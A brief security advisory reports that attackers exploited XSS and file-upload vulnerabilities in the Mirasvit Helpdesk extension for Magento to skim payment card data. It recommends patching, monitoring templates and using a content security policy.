Magento Sites Targeted via Vulnerable Mirasvit Helpdesk Extension

According to security researcher Willem de Groot, hackers are actively targeting Magento ecommerce sites running “Mirasvit Helpdesk,” an extension that allows visitors to chat live with the website’s helpdesk agents. In September 2017, security firm WebShield published details on two vulnerabilities affecting the extension, warning that all versions released up to that point were vulnerable. The first vulnerability, CVE-2017-14320, allows threat actors to upload files to the underlying Magento server and the second, CVE-2017-14321, is a cross-site scripting (XSS) vulnerability that allows threat actors to inject arbitrary web script or HTML. Both vulnerabilities were patched by Mirasvit in September with the version 1.5.3 release; however, threat actors are exploiting the XSS flaw to breach unpatched Magento sites, inserting malicious code into the store’s footer section to execute on all of the store’s pages and exfiltrate payment card data from the store’s checkout process. The NJCCIC highly recommends administrators of Magento-powered sites running the Mirasvit Helpdesk extension review Willem de Groot’s report and Magento’s associated security advisory, and update the affected extension to version 1.5.3 or later. Additionally, monitor websites for modified header/footer template insertions or add a content security policy (CSP) header to prevent the unauthorized execution of JavaScript. A free malware scanner for administrators of websites using the Magento ecommerce platform is available on GitHub. The NJCCIC makes no claim as to the effectiveness of this tool and users are advised to exercise caution when downloading and installing any software from the internet.